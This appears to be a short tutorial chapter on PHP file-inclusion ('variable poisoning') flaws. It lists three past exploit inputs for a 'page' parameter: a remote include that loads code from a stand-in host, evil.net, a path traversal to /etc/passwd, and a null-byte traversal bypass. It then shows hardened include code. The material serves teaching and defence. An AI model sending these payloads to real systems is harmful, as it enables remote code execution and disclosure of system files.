Variable Poisoning :: Chapter 4

Variable Poisoning :: Chapter 4

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
  3. ./?page=....//....//....//....//....//....//....//etc/passwd%00.php
New Code:
  1. // php.ini :: allow_url_fopen = Off
  2. if (!preg_match ('/\.php$/i', $_GET['page'])) {
  3.     die ('Invalid request.');
  4. }
  5. $include_file = $_GET['page'];
  6. while (stristr ($include_file, '../')) {
  7.     $include_file = str_replace ('../', '', $include_file);
  8. }
  9. $path = '/path/to/file/';
  10. if (file_exists ($path . $include_file)) {
  11.     include $path . $include_file;
  12. }